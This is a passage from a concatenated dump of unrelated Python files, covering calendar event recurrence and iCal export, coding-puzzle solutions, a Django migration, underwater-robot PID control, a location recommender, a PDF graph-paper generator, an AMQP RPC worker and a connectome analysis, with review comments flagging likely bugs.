                    rule._dtstart = to_local(rule._dtstart, self.timezone)
                if getattr(rule, '_until', None):
                    rule._until = to_local(rule._until, self.timezone)
                rule = rrulestr(str(rule))
            except ValueError:
                # This might happen if only RDATEs and EXDATEs are present
                rule = rrulestr(self.recurrence, dtstart=start_local)

            # Make sure, the RDATEs and EXDATEs contain the start times
            for attribute in ('_exdate', '_rdate'):
                if hasattr(rule, attribute):
                    setattr(rule, attribute, [
                        to_local(date_, self.timezone).replace(
                            hour=start_local.hour, minute=start_local.minute
                        )
                        for date_ in getattr(rule, attribute)
                    ])

            # Generate the occurrences and convert to UTC
            dates = [standardize_date(date_, self.timezone) for date_ in rule]

            # Make sure the start date is part of the recurrence
            if self.start not in dates:
                dates.append(self.start)
                dates.sort()

        if localize:
            dates = [to_timezone(date_, self.timezone) for date_ in dates]

        if limit:
            max_year = datetime.today().year + self.occurrence_dates_year_limit
            dates = [date_ for date_ in dates if date_.year <= max_year]

        return dates
    def spawn_occurrence(self, start):
        """ Create an occurrence at the given date, without storing it.

        The end is shifted to preserve the event's duration and the name is
        made unique by appending the ISO start date.
        """
        end = start + (self.end - self.start)
        name = '{0}-{1}'.format(self.name, start.date().isoformat())
        return Occurrence(
            title=self.title,
            name=name,
            location=self.location,
            tags=self.tags,
            start=start,
            end=end,
            timezone=self.timezone,
        )
    @property
    def virtual_occurrence(self):
        """ Before the event is accepted, there are no real occurrences stored
        in the database.

        At this time it is useful to be able to generate the latest occurrence
        without storing it.

        """
        for start in self.occurrence_dates(limit=False):
            occurrence = self.spawn_occurrence(start)
            occurrence.event = self

            with warnings.catch_warnings():
                warnings.filterwarnings(
                    'ignore', 'Object of type <Occurrence> not in session')

                # keep the virtual occurrence out of the session so it is
                # never persisted
                session = object_session(self)
                session.expunge(occurrence)
                session.flush()

            # NOTE(review): this returns on the first loop iteration, i.e.
            # the *first* occurrence date rather than the latest -- confirm.
            return occurrence

    def _update_occurrences(self):
        """ Updates the occurrences.

        Removes all occurrences if the event is not published or no start and
        end date/time is set. Only occurrences for this and next year are
        created.

        """

        # clear old occurrences
        self.occurrences = []

        # do not create occurrences unless the event is published
        if not self.state == 'published':
            return

        # do not create occurrences unless start and end is set
        if not self.start or not self.end:
            return

        # create all occurrences for this and next year
        for start in self.occurrence_dates():
            self.occurrences.append(self.spawn_occurrence(start))
    def submit(self):
        """ Submit the event. Only allowed from the 'initiated' state. """
        assert self.state == 'initiated'
        # setting state triggers __setattr__, which updates occurrences
        self.state = 'submitted'

    def publish(self):
        """ Publish the event.

        Publishing the event will generate the occurrences.

        """
        assert self.state == 'submitted' or self.state == 'withdrawn'
        self.state = 'published'

    def withdraw(self):
        """ Withdraw the event.

        Withdrawing the event will delete the occurrences."""
        assert self.state in ('submitted', 'published')
        self.state = 'withdrawn'
    def get_ical_vevents(self, url=None):
        """ Returns the event and all its occurrences as icalendar objects.

        If the calendar has a bunch of RDATE's instead of a proper RRULE, we
        return every occurrence as separate event since most calendars don't
        support RDATE's.

        """
        modified = self.modified or self.created or datetime.utcnow()

        # NOTE: this local deliberately shadows the `rrule` module import;
        # within this method it holds the parsed recurrence (or '').
        rrule = ''
        if self.recurrence:
            rrule = vRecur.from_ical(self.recurrence.replace('RRULE:', ''))

        for dtstart in self.occurrence_dates():
            dtstart = to_timezone(dtstart, UTC)
            dtend = dtstart + (self.end - self.start)

            vevent = vEvent()
            vevent.add('uid', f'{self.name}-{dtstart.date()}@onegov.event')
            vevent.add('summary', self.title)
            vevent.add('dtstart', dtstart)
            vevent.add('dtend', dtend)
            vevent.add('last-modified', modified)
            vevent.add('dtstamp', modified)
            vevent.add('location', self.location)
            vevent.add('description', self.description)
            vevent.add('categories', self.tags)
            if rrule:
                vevent.add('rrule', rrule)
            if url:
                vevent.add('url', url)
            if self.coordinates:
                vevent.add('geo', (self.coordinates.lat, self.coordinates.lon))
            yield vevent

            if rrule:
                # a proper RRULE already describes all occurrences, so one
                # vevent is enough
                break

    def as_ical(self, url=None):
        """ Returns the event and all its occurrences as iCalendar string.

        """
        vcalendar = vCalendar()
        vcalendar.add('prodid', '-//OneGov//onegov.event//')
        vcalendar.add('version', '2.0')
        for vevent in self.get_ical_vevents(url):
            vcalendar.add_component(vevent)
        return vcalendar.to_ical()
|
class Solution(object):
    def findRelativeRanks(self, nums):
        """
        :type nums: List[int]
        :rtype: List[str]

        Rank every score by sorting a copy in descending order, then map
        each original score back to its medal / rank string.
        """
        medals = ("Gold Medal", "Silver Medal", "Bronze Medal")
        rank_of = {}
        for position, score in enumerate(sorted(nums, reverse=True)):
            rank_of[score] = medals[position] if position < 3 else str(position + 1)
        return [rank_of[score] for score in nums]
|
# Generated by Django 3.2.5 on 2021-08-26 05:11
from django.db import migrations, models
class Migration(migrations.Migration):
    # Adds an optional photo field to the app_order Products model.

    dependencies = [
        ('app_order', '0003_auto_20210825_1607'),
    ]

    operations = [
        migrations.AddField(
            model_name='products',
            name='product_photo',
            field=models.ImageField(blank=True, null=True, upload_to='product_photos/%Y/%m/%d/', verbose_name='Фото'),
        ),
    ]
|
import colorsys
import time
from typing import Union
import cv2 as cv
import numpy as np
from scipy import integrate
import pymurapi as mur
auv = mur.mur_init()
from typing import Tuple
class Color:
    """A named triple of colour components (channel meaning is up to the
    caller, e.g. HSV or BGR)."""

    def __init__(self, x: float, y: float, z: float, name: str = ...) -> None:
        # `...` (Ellipsis) mirrors the original default: an "unnamed"
        # sentinel, later overwritten by ColorRange.
        self.name = name
        self.x = x
        self.y = y
        self.z = z

    def to_tuple(self) -> Tuple:
        """Return the three components as an (x, y, z) tuple."""
        return self.x, self.y, self.z
class ColorRange:
    # A named [min_color, max_color] interval, used for colour thresholding.
    def __init__(self, min_color: Color = ...,
                 max_color: Color = ...,
                 name: str = ..., ) -> None:
        self.name = name
        self.min_color = min_color
        self.max_color = max_color
        # Propagate the range's name onto both endpoint colours (this
        # mutates the Color objects passed in).
        self.min_color.name = name
        self.max_color.name = name
class MotorController:
    """Thin wrapper around a single motor of an AUV."""

    def __init__(self, motor_id: int, target_auv: "mur.auv.Auv"):
        """
        Initializes controller

        :param motor_id:
            id of controlled motor
        :param target_auv:
            AUV, whose motors will be controlled

        :returns: MotorController
        """
        self.id = motor_id
        self.auv = target_auv

    def set_power(self, power: Union[float, int]) -> None:
        """
        Sets power of this motor

        :param power:
            Power to set motor to, automatically clamped to the
            [-100, 100] range.
        """
        # Bug fix: the old chained conditional mapped power == -100 to +100
        # (full reverse became full forward). A symmetric clamp has no such
        # hole and is equivalent everywhere else.
        self.auv.set_motor_power(self.id, max(-100, min(100, power)))
class PIDReg:
    """Simple PID-style regulator with fixed gains."""

    def __init__(self, p_coeff, i_coeff, d_coeff):
        # Proportional / integral / derivative gains.
        self.p_coeff = p_coeff
        self.i_coeff = i_coeff
        self.d_coeff = d_coeff
        self.prev_iter_time = 0  # never updated below -- appears to be dead state
        self.dt = 0              # time value used by compute()
        self.de = 0              # previous *control signal* (see compute())

    def compute(self, error: float) -> float:
        """Compute control signal of given PIDReg, rudimentary FBL-protection included
        Args:
            error (float): Error, based of which result will be computed
        Returns:
            float: Control signal, pass this into control sequence
        """
        # NOTE(review): thread_time() is the total CPU time of this thread,
        # not the interval since the last call, so dt grows monotonically --
        # confirm this is intended.
        self.dt = time.thread_time()
        # NOTE(review): the integrand is constant in the integration
        # variable, so the quad() term equals error * dt**2 / 2; and
        # self.de holds the previous control signal, not the previous
        # error, so the D term is not a conventional derivative -- verify
        # against the intended control design.
        control_signal: float = \
            self.p_coeff * error + \
            self.i_coeff * integrate.quad(lambda _: error * self.dt, 0, self.dt / 2)[0] + \
            self.d_coeff * (self.de / self.dt)
        # Asymmetric saturation: outputs beyond +/-100 are pulled back to +/-50.
        control_signal = 50 if control_signal > 100 else -50 if control_signal < -100 else control_signal
        self.de = control_signal
        return control_signal
def move(angle: int = None):
    """Rotate the AUV in place until its yaw settles on ``angle``.

    Runs a PID loop on the yaw error, driving the two front motors in
    opposite directions, and declares the heading stable once the error
    stays at or below 1 degree for 10 consecutive iterations.

    :param angle: target yaw in degrees; defaults to the AUV's yaw at call
        time.  BUGFIX: the previous default ``auv.get_yaw()`` was evaluated
        once at import time, freezing the module-load heading forever.
    :return: the yaw reported by the AUV after stabilisation.
    """
    if angle is None:
        angle = auv.get_yaw()
    yaw_pidr = PIDReg(.5, .01, .1)
    lf_motor = MotorController(0, auv)
    rf_motor = MotorController(1, auv)
    stab_counter = 0
    while stab_counter <= 10:
        stab_counter += 1
        x_error = clamp_angle(angle - auv.get_yaw())
        u = yaw_pidr.compute(x_error)
        lf_motor.set_power(-u)
        rf_motor.set_power(u)
        if x_error > 1:
            # Still off target: restart the stability countdown.
            stab_counter = 0
    return auv.get_yaw()
def clamp_angle(angle):
    """Map an angle into (-180, 180] by at most one 360-degree shift.

    Only a single wrap is applied (matching the original behaviour), so
    inputs more than a full turn out of range are not fully normalised.
    """
    if angle > 180:
        angle -= 360
    elif angle < -180:
        angle += 360
    return angle
def arrow_direction(arrow_contour):
    """Print whether an arrow-shaped contour points "up" or "down".

    Compares the contour's centroid (from image moments) against the middle
    of its minimum-area bounding rectangle.
    """
    arr_rect = cv.minAreaRect(arrow_contour)
    # Corner points of the rotated bounding box (computed but unused).
    arr_box = np.int0(cv.boxPoints(arr_rect))
    arr_moments = cv.moments(arrow_contour)
    # Contour centroid; raises ZeroDivisionError for degenerate contours
    # with zero area (m00 == 0).
    arr_cx = int(arr_moments['m10'] / arr_moments['m00'])
    arr_cy = int(arr_moments['m01'] / arr_moments['m00'])
    # NOTE(review): arr_rect[0][0] is the box centre's *x* coordinate, yet
    # it is compared against the centroid's *y* (plus the box height); the
    # print below uses arr_rect[0][1] (centre y) instead.  One of the two
    # indices looks wrong -- confirm against the camera geometry.
    if arr_cy > arr_rect[0][0] + arr_rect[1][1] / 2:
        print("up")
    else:
        print("down")
    print(arr_rect[0][1] + arr_rect[1][1] / 2)
# Named HSV ranges as (lower, upper) bound tuples for inRange-style
# thresholding.  NOTE(review): "red" wraps around the hue axis (170 -> 5),
# so it cannot be used as a single inRange interval without splitting.
hsv_values = dict(
    white=((0, 0, 191.25), (180, 25.5, 255)), lightgrey=((0, 0, 127.5), (255, 255, 191.25)),
    darkgrey=((0, 0, 63.75), (255, 255, 127.5)), black=((0, 0, 0), (255, 255, 63.75)),
    red=((170, 20, 20), (5, 255, 255)), pink=((135, 20, 20), (170, 255, 255)),
    purple=((115, 20, 20), (135, 255, 255)), blue=((100, 20, 20), (115, 255, 255)),
    lblue=((92.5, 20, 20), (100, 255, 255)), green=((60, 20, 20), (92.5, 255, 255)),
    yellow=((25, 20, 20), (60, 255, 255)), orange=((10, 20, 20), (20, 255, 255)),
    color=((0, 20, 20), (180, 255, 255))
)
|
# Author : Xiang Xu
# -*- coding: utf-8 -*-
from math import sqrt
dataset = {}  # user id -> {location id: visit count}, filled by get_dataset()
def get_dataset(amount):
    """Load check-in counts for the first ``amount`` users into ``dataset``.

    Reads the tab-separated Gowalla check-in file line by line; for each
    user (column 0) it counts visits per location (last column).  Stops as
    soon as a new user would exceed ``amount`` users.
    """
    global dataset
    totalCheckinsFile = open('Gowalla_totalCheckins.txt', 'r')
    user = ''
    for line in totalCheckinsFile:
        token = line.strip().split('\t')
        # A new user appears while we already hold ``amount`` users: stop.
        if token[0] != user and len(dataset) == amount:
            totalCheckinsFile.close()
            return
        user = token[0]
        dataset.setdefault(user, {})
        location = token[-1]
        dataset[user].setdefault(location, 0)
        dataset[user][location] += 1
    # NOTE(review): if the loop runs to completion the file is never
    # closed -- consider a with-block.
def similarity_score(person1, person2):
    """Euclidean-distance similarity of two users: 1 / (1 + distance).

    Returns 0 when the two users share no locations at all.
    """
    common = [item for item in dataset[person1] if item in dataset[person2]]
    if not common:
        return 0
    squared_diffs = sum(
        pow(dataset[person1][item] - dataset[person2][item], 2)
        for item in common
    )
    return 1 / (1 + sqrt(squared_diffs))
def most_similar_users(person, number_of_users):
    """Return the ``number_of_users`` users most similar to ``person``.

    Similarity comes from ``pearson_correlation``; results are
    (score, user) tuples ordered best-first.
    """
    scores = [(pearson_correlation(person, other), other)
              for other in dataset if other != person]
    return sorted(scores, reverse=True)[:number_of_users]
def pearson_correlation(person1, person2):
    """
    Calculate similarity between two person,
    use Ajusted Cosine algorithm
    """
    # Locations visited by both users.
    both_rated = {item: 1 for item in dataset[person1] if item in dataset[person2]}
    number_of_ratings = len(both_rated)
    if number_of_ratings == 0:
        # Nothing in common -> no correlation.
        return 0
    # Per-user sums, sums of squares, and the cross-product sum over the
    # shared locations.
    p1_rated_sum = sum(dataset[person1][item] for item in both_rated)
    p2_rated_sum = sum(dataset[person2][item] for item in both_rated)
    p1_rated_square_sum = sum(pow(dataset[person1][item], 2) for item in both_rated)
    p2_rated_square_sum = sum(pow(dataset[person2][item], 2) for item in both_rated)
    product_sum_of_both_users = sum(
        dataset[person1][item] * dataset[person2][item] for item in both_rated)
    numerator = product_sum_of_both_users - (p1_rated_sum * p2_rated_sum / number_of_ratings)
    denominator = sqrt((p1_rated_square_sum - pow(p1_rated_sum, 2) / number_of_ratings) * (p2_rated_square_sum - pow(p2_rated_sum, 2) / number_of_ratings))
    if denominator == 0:
        return 0
    return numerator / denominator
def user_reommendations(person):
    """
    Recommend person for locations with Collaborative Filtering algorithm
    """
    # (The function name keeps its historical typo -- callers use it as-is.)
    # Gets recommendations for a person by using a weighted average of every other user's rankings
    totals = {}
    simSums = {}
    for other in dataset:
        if other != person:
            sim = pearson_correlation(person,other)
            # ignore scores of zero or lower
            if sim <=0:
                continue
            for item in dataset[other]:
                # only score locations this person hasn't visited yet
                if item not in dataset[person] or dataset[person][item] == 0:
                    # Similarity * score
                    totals.setdefault(item,0)
                    totals[item] += dataset[other][item]* sim
                    # sum of similarities
                    simSums.setdefault(item,0)
                    simSums[item] += sim
    # Normalise each weighted total by the similarity mass behind it,
    # then order best-first.
    rankings = [(total/simSums[item],item) for item,total in totals.items()]
    rankings.sort()
    rankings.reverse()
    recommendataions_list = [recommend_item for score,recommend_item in rankings]
    # Cap the recommendation list at 10 entries.
    if len(recommendataions_list) > 10: recommendataions_list = recommendataions_list[:10]
    return recommendataions_list
if __name__ == '__main__':
    # Load the first 100 users, then print top-10 location recommendations
    # for each.  (Python 2 print statement -- this module is Python 2 only.)
    get_dataset(100)
    for user in dataset.keys():
        rlist = user_reommendations(user)
        print "recommend user {0} for theses locations: {1}".format(user, ' '.join(rlist))
|
# cook your dish here
# Redistribution simulation: on each step every value is halved and each of
# the three slots receives half of each of the other two.  Counts how many
# steps are possible; -1 means the process never terminates (all equal).
X, Y, Z = input().split()
X = int(X)
Y = int(Y)
Z = int(Z)
action = 0  # completed redistribution steps; -1 = infinite
while(True):
    if X == Y and Y == Z:
        # Equal values reproduce themselves forever.
        action = -1
        break
    elif X%2 == 0 and Y%2 == 0 and Z%2 == 0:
        temp_X = int(Y/2) + int(Z/2)
        temp_Y = int(X/2) + int(Z/2)
        temp_Z = int(X/2) + int(Y/2)
        action = action + 1
    else:
        # Some value is odd -> it cannot be halved evenly; stop.
        break
    X = temp_X
    Y = temp_Y
    Z = temp_Z
print(action)
|
import logging
import collections
import datetime
import asyncio
import unittest
import os
from subprocess import call
from pathlib import Path
from rdflib import URIRef, Literal, Graph, ConjunctiveGraph, Dataset
from aiohttp_rdf4j.aiograph import AioRDF4jStore, AioRDF4jServer
from aiohttp_rdf4j.utils import async_fill_graph
from contextlib import contextmanager
# Module logger: DEBUG level, echoed to stderr via a stream handler.
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
logger.addHandler(logging.StreamHandler())
# Prefer uvloop's event loop implementation when it is installed.
try:
    import uvloop
    asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
    logger.info("uvloop activated")
except ImportError:
    logger.info("uvloop not activated")
THIS_DIR = Path(__file__).parent
async def async_gen(iterable):
    """Wrap a plain iterable as an async generator.

    Before yielding each item the coroutine awaits ``asyncio.sleep(0)``,
    a bare scheduler yield that lets other tasks on the loop run.

    :param iterable: any ordinary (non-async) iterable
    :return: an async generator producing the same items
    """
    for element in iter(iterable):
        await asyncio.sleep(0)
        yield element
def ml(l):
    """Return the list [0, 1, ..., l-1]."""
    return list(range(l))


# Three work lists of different sizes for the concurrency demo below.
l1 = ml(1000)
l2 = ml(10000)
l3 = ml(500)
async def f(l, id):
    """Drain ``l`` through async_gen, printing every 10th element tagged
    with ``id``, then print the final element once more.

    Note: if ``l`` is empty the trailing print raises NameError because
    ``i`` was never bound (unchanged from the original behaviour).
    """
    async for i in async_gen(l):
        if i % 10 == 0:
            print(i, id)
    print(i, id)
# Drive all three consumers concurrently on one event loop; the per-item
# sleep(0) in async_gen lets them interleave.
# NOTE(review): manual get_event_loop()/run_until_complete is the legacy
# style; asyncio.run(...) is the modern equivalent.
loop = asyncio.get_event_loop()
loop.run_until_complete(asyncio.gather(f(l1,1), f(l2, 2), f(l3, 3)))
loop.close()
|
#!/usr/bin/python2
# encoding: utf8
from __future__ import division
import reportlab
from reportlab.pdfgen import canvas
from reportlab.lib.pagesizes import A4
from reportlab.lib.units import cm,mm
from math import *
from reportlab.lib.colors import *
def rect(c, x1, y1, x2, y2):
    """Build and return a closed rectangular path on canvas ``c``.

    The path is only constructed, not drawn; opposite corners are
    (x1, y1) and (x2, y2).
    """
    path = c.beginPath()
    path.moveTo(x1, y1)
    path.lineTo(x2, y1)
    path.lineTo(x2, y2)
    path.lineTo(x1, y2)
    path.close()
    return path
def grid(c, nx=50, ny=70, d=4*mm):
    """Draw an nx-by-ny grid of spacing ``d`` on canvas ``c``.

    Line weight encodes position: every 10th line heavy, every 5th medium,
    the rest hairline.  Drawing is clipped to the grid rectangle, and the
    heavy every-10th lines get a thin white stripe drawn on top.
    """
    def set_width(i):
        # Heavier strokes on multiples of 10, medium on multiples of 5.
        if i % 10 == 0:
            c.setLineWidth(1.3*mm)
        elif i % 5 == 0:
            c.setLineWidth(0.5*mm)
        else:
            c.setLineWidth(0.1*mm)
    clipp_rect = rect(c,0,0,d*nx,d*ny)
    c.setLineWidth(0.1*mm)
    c.setStrokeColor(white)
    c.clipPath(clipp_rect)
    c.setStrokeColor(black)
    for i in range(ny+1):
        set_width(i)
        c.line(0,i*d,nx*d,i*d) #x
    for i in range(nx+1):
        set_width(i)
        c.line(i*d,0,i*d,ny*d) #y
    # White overlay stripe down the middle of each heavy line.
    c.setStrokeColor(white)
    c.setLineWidth(0.3*mm)
    for i in range(ny+1):
        if i % 10 == 0:
            c.line(0,i*d,nx*d,i*d) #x
    for i in range(nx+1):
        if i % 10 == 0:
            c.line(i*d,0,i*d,ny*d) #y
    if 0:
        # Debug (disabled): outline the clip rectangle in red.
        c.setStrokeColor(red)
        c.setLineWidth(1*mm)
        c.drawPath(clipp_rect)
# Emit four pages of graph paper with increasing cell sizes
# (4 mm, 10 mm, ~12.5 mm, 20 mm) into rechenpapier.pdf.
c = canvas.Canvas("rechenpapier.pdf",pagesize=A4)
c.translate(0.5*cm,1*cm)
grid(c,nx=50,ny=70,d=4*mm)
c.showPage()
c.translate(0.5*cm,1.5*cm)
grid(c,nx=20,ny=20,d=10*mm)
c.showPage()
c.translate(0.5*cm,1.5*cm)
grid(c,nx=15,ny=15,d=12.54*mm)
c.showPage()
c.translate(0.5*cm,5*cm)
grid(c,nx=10,ny=10,d=20*mm)
c.showPage()
c.save()
|
# String-method practice: count occurrences of "o" in a template string
# (the remaining experiments below are kept commented out).
x=23
y=34
str1="HELLO GERMANY how are you? x owe me {} y owe me {}"
print(str1.count("o"))
# print(str1.format(x,y))
#
# print(str1.center(100,"o").format(x,y))
# print(len(str1))
# print(str1[0:5])
# print(str1[24])
# #
# # print("hello" in str1)
# # print("G" not in str1)
# # print ("how" in str1)
#
# # using if
# if "how" in str1:
# print("yes")
#
# print(str1.index("G"))
# print(str1.isalnum()) |
#!/usr/bin/env python
# Author:tjy
import copy
# names = ['Tom', 'Jick', 'Alex', 'TJY']
# names.sort(key=len,reverse=False)
# names.reverse()
# if 'TJY' in names and 'tjy' not in names:
# names.remove('TJY')
# names.append('tjy')
# names.pop(1)
# names.extend(['aa.xml', 'bb', 12])
# names.insert(2, 'aa.xml')
# print(names.index('Jick'))
# names.append('kitty')
# names1 = names.copy()
# names1[-2][0] = 'jick'
# names1[0] = 'tom'
# print(names1)
# names2 = copy.copy(names)
# names2[-1][0] = 'jack'
# print(names2)
# names3 = copy.deepcopy(names)
# names3[-1][1] = 'cc'
# print(names3)
# num = names.count('tom')
# print(num)
# print(names)
str1 = 'i love python'  # sample string for the commented-out str-method demos below
# print(str1.count('1'))
# print(str1.center(50,'='))
# print(str1.count('i'))
# print(str1.encode())
# print(str1.expandtabs(50))
# print(str1.endswith('on'))
# print(str1.startswith('i '))
# print(str1.find('w')) #没有找到返回-1,找了了返回索引值
# print(str1.index('l'))
# print(' '.isspace())
# print('00'.isnumeric()) # 是否为纯数字
# print('a1b2'.isalnum())
# print('1E23'.isdecimal())
# print('00'.isdigit()) # 是否为整数,包含0
# print('a12'.isidentifier()) # 是否为合法的标识符,即是否为合法的变量名
# print('a \t\ns'.islower()) # 是否为大写字母,自动忽略空格,制表符,换行符
# print('\t\nSA \t'.isupper()) # 同上
# print('df'.isprintable()) # 主要用于设备文件和驱动文件
# print('I Am A Goodmen'.istitle())
# print('|'.join(['12','23','34'])) # 列表中必须是字符串
# print('\n'.join(('a', 'b'))) # 也可以是tuple
# print('\n'.join('hello')) # 字符串
# print('\n'.join({'name':"tjy", 'age':18})) #字典只取key值
#
# b = 'a'.rjust(50,'=')
# print(b)
# print(len(b))
# print(str)
# print('djsk fsd\r\nfdfd'.split('\n'))
# print('djsk fsd\r\nfdfd'.splitlines()) # \r\n 和 \n 都可以作为分隔符
# print('djsk fsd\nfdfd'.splitlines())
# b = '\nfjdk\t\n\r'.strip()
# print(b)
# print(len(b))
# print('faS dfs1'.swapcase()) # 大小写交互,数字不变
# print('i am a boy'.title()) # 变为标题
# b = str.maketrans('abcd1234','hijklmn0')
# print('aa123fd'.translate(b))
# print('i am a boy'.partition('a'))
# print('is is '.replace('is','are'))
# print('is a good boy,is'.rindex('is'))
|
#!/usr/bin/env python3
import AmqpConnector
import msgpack
import logging
import os.path
import threading
import ssl
import time
import traceback
RUN_STATE = True  # global run flag; presumably cleared externally (signal handler?) to stop workers -- confirm
class RpcHandler(object):
    """Base class for AMQP-backed RPC workers.

    Subclasses implement ``process()``; ``processEvents()`` runs the
    connect / receive / respond / disconnect loop.  Messages are
    msgpack-encoded dicts.
    """

    # Set True (by error handling or Ctrl-C) to make the event loop exit.
    die = False

    def __init__(self, settings):
        # Name the logger after the worker thread so parallel workers are
        # distinguishable in log output.
        thName = threading.current_thread().name
        if "-" in thName:
            logPath = "Main.Thread-{num}.RPC".format(num=thName.split("-")[-1])
        else:
            logPath = 'Main.RPC'
        self.log = logging.getLogger(logPath)
        self.log.info("RPC Management class instantiated.")
        self.settings = settings
        # Require clientID in settings
        assert 'clientid' in settings
        assert "RABBIT_LOGIN" in settings
        assert "RABBIT_PASWD" in settings
        assert "RABBIT_SRVER" in settings
        assert "RABBIT_VHOST" in settings
        if not self.settings:
            raise ValueError("The 'settings.json' file was not found!")
        self.cert = self.findCert()

    def findCert(self):
        '''
        Verify the SSL cert exists in the proper place.
        '''
        curFile = os.path.abspath(__file__)
        curDir = os.path.split(curFile)[0]
        certPath = os.path.join(curDir, './deps/cacert.pem')
        assert os.path.exists(certPath)
        return certPath

    def process(self, body):
        # Subclass hook: receives the decoded request dict, must return a dict.
        raise ValueError("This must be subclassed!")

    def _process(self, body):
        '''
        Decode ``body``, dispatch to ``process()``, and build the
        msgpack-encoded reply plus an optional post-response delay.
        Exceptions raised by ``process()`` are converted into an error
        reply carrying the traceback instead of propagating.
        '''
        # body = json.loads(body)
        body = msgpack.unpackb(body, use_list=True, encoding='utf-8')
        assert isinstance(body, dict) == True, 'The message must decode to a dict!'
        delay = None
        try:
            if 'postDelay' in body:
                delay = int(body['postDelay'])
            self.log.info("Received request. Processing.")
            ret = self.process(body)
            assert isinstance(ret, dict) == True, '`process()` call in child-class must return a dict!'
            # Copy the jobid and dbid across, so we can cross-reference the job
            # when it's received.
            if 'jobid' in body:
                ret['jobid'] = body['jobid']
            if not 'success' in ret:
                ret['success'] = True
            if not 'cancontinue' in ret:
                ret['cancontinue'] = True
            self.log.info("Processing complete. Submitting job with id '%s'.", ret['jobid'])
        except Exception:
            # Turn the failure into a structured error reply; the traceback
            # travels back to the caller for debugging.
            ret = {
                'success' : False,
                'error' : "unknown",
                'traceback' : traceback.format_exc(),
                'cancontinue' : True
            }
            if 'jobid' in body:
                ret['jobid'] = body['jobid']
            self.log.error("Had exception?")
            for line in traceback.format_exc().split("\n"):
                self.log.error(line)
            # Disable the delay if the call had an exception.
            delay = 0
        if not 'cancontinue' in ret:
            self.log.error('Invalid return value from `process()`')
        elif not ret['cancontinue']:
            self.log.error('Uncaught error in `process()`. Exiting.')
            self.die = True
        ret['user'] = self.settings['clientid']
        self.log.info("Returning")
        return msgpack.packb(ret, use_bin_type=True), delay
        # return json.dumps(ret), delay

    def successDelay(self, sleeptime):
        '''
        Delay for `sleeptime` seconds, but output a "Oh hai, I'm sleeping" message
        every 15 seconds while doing so.
        Also, return immediately if told to exit.
        '''
        if sleeptime and not self.die and RUN_STATE:
            self.log.info("Sleeping %s seconds.", sleeptime)
            for x in range(sleeptime):
                time.sleep(1)
                if (sleeptime - x) % 15 == 0:
                    self.log.info("Sleeping %s more seconds....", sleeptime - x)
                if not RUN_STATE:
                    self.log.info( "Breaking due to exit flag being set")
                    break

    def processEvents(self):
        '''
        Connect to the server, wait for a task, and then disconnect untill another job is
        received.
        The AMQP connection is not maintained due to issues with long-lived connections.
        '''
        if self.cert:
            sslopts = {"cert_reqs" : ssl.CERT_REQUIRED, "ca_certs" : self.cert}
        else:
            sslopts = None
        shutdownType = "dirty"  # NOTE(review): assigned but never read -- dead state?
        try:
            while RUN_STATE and not self.die:
                try:
                    connector = AmqpConnector.Connector(userid = self.settings["RABBIT_LOGIN"],
                        password = self.settings["RABBIT_PASWD"],
                        host = self.settings["RABBIT_SRVER"],
                        virtual_host = self.settings["RABBIT_VHOST"],
                        ssl = sslopts,
                        session_fetch_limit = 1,
                        durable = True,
                        )
                except IOError:
                    # Broker unreachable: log and retry on a fixed 30 s backoff.
                    self.log.error("Error while connecting to server.")
                    self.log.error("Is the AMQP server not available?")
                    for line in traceback.format_exc().split("\n"):
                        self.log.error(line)
                    self.log.error("Trying again in 30 seconds.")
                    time.sleep(30)
                    continue
                self.log.info("Connection Established. Awaiting RPC requests")
                # Poll for a single message, answer it, then drop the
                # connection (session_fetch_limit=1 above).
                while RUN_STATE and not self.die:
                    message = connector.getMessage()
                    if message:
                        self.log.info("Processing message.")
                        response, postDelay = self._process(message)
                        self.log.info("Response message size: %0.3fK. Sending", int(len(response)/1024))
                        connector.putMessage(response)
                        break
                    time.sleep(0.1)
                self.log.info("Closing RPC queue connection.")
                connector.stop()
                # NOTE(review): if the inner loop exited without receiving a
                # message (shutdown requested), postDelay is unbound here.
                self.successDelay(postDelay)
        except KeyboardInterrupt:
            self.log.info("Keyboard Interrupt exit!")
            self.die = True
        self.log.info("Halting message consumer.")
        try:
            connector.stop()
        except Exception:
            self.log.error("Closing the connector produced an error!")
            for line in traceback.format_exc().split("\n"):
                self.log.error(line)
        self.log.info("Closed. Exiting")
        if not RUN_STATE or self.die:
            raise KeyboardInterrupt
|
from .LastVersionDetector import LastVersionDetector
|
import networkx as nx
import matplotlib.pyplot as plt
import csv
import pandas
import random
import pickle
import numpy as np
from statistics import median
# C. elegans pharynx connectome plus simulation parameters.
G = nx.read_graphml("data/c.elegans.herm_pharynx_1.graphml")
timesteps = 500
simulation_no = 100
timedelay_range = 20  # exclusive upper bound on the time delays examined
probabilityData = {}
def nodeDegreeClassification(G, median):
    """Tag every node with a 'degreeClass' of 'High' or 'Low'.

    Nodes whose degree exceeds ``median`` are classed 'High', the rest
    'Low' (stored in ``G.node[n]['degreeClass']``).

    :param G: graph exposing the pre-2.0 networkx API (``adjacency_iter``)
    :param median: degree threshold
    :return: (fraction of 'High' nodes, count of 'High' nodes)
    """
    # Cleanup: removed the unused ``averageEdges`` computation.
    highCounter = 0
    for n, nbrs in G.adjacency_iter():
        if G.degree(n) > median:
            G.node[n]['degreeClass'] = 'High'
            highCounter += 1
        else:
            G.node[n]['degreeClass'] = 'Low'
    hubFraction = float(highCounter) / G.number_of_nodes()
    return hubFraction, highCounter
def medianDegree(G):
    """Return the median node degree of ``G`` (pre-2.0 networkx API)."""
    return median([G.degree(n) for n, nbrs in G.adjacency_iter()])
# Threshold degree separating hub ('High') from non-hub ('Low') nodes.
median = medianDegree(G)
print median
# NOTE(review): nodeDegreeClassification returns a (fraction, count) tuple,
# so ``hubFraction`` here is a tuple, not a float -- confirm intended.
hubFraction = nodeDegreeClassification(G, median)
with open('data/randomResults/dTEdata_chem.txt', 'rb') as f:
    dTE = pickle.load(f)
def SM(G, dTE, timedelay):
    """For each delay h, compute mean dTE over sensor ('S') source nodes
    minus mean dTE over motor ('M') source nodes.

    :param G: graph whose nodes carry a 'role' attribute ('S'/'M'/other)
    :param dTE: nested dict dTE[h][i][j] of delayed transfer-entropy values
    :param timedelay: exclusive upper bound on the delays examined (from 1)
    :return: dict mapping h -> (mean S value - mean M value); 0 if no S data
    """
    SM = {}
    for h in range(1, timedelay):
        dTE_S = 0
        dTE_M = 0
        SCount = 0
        MCount = 0
        SM[h] = {}
        # Accumulate dTE over all ordered node pairs present in dTE[h].
        for i,nbrs1 in G.adjacency_iter():
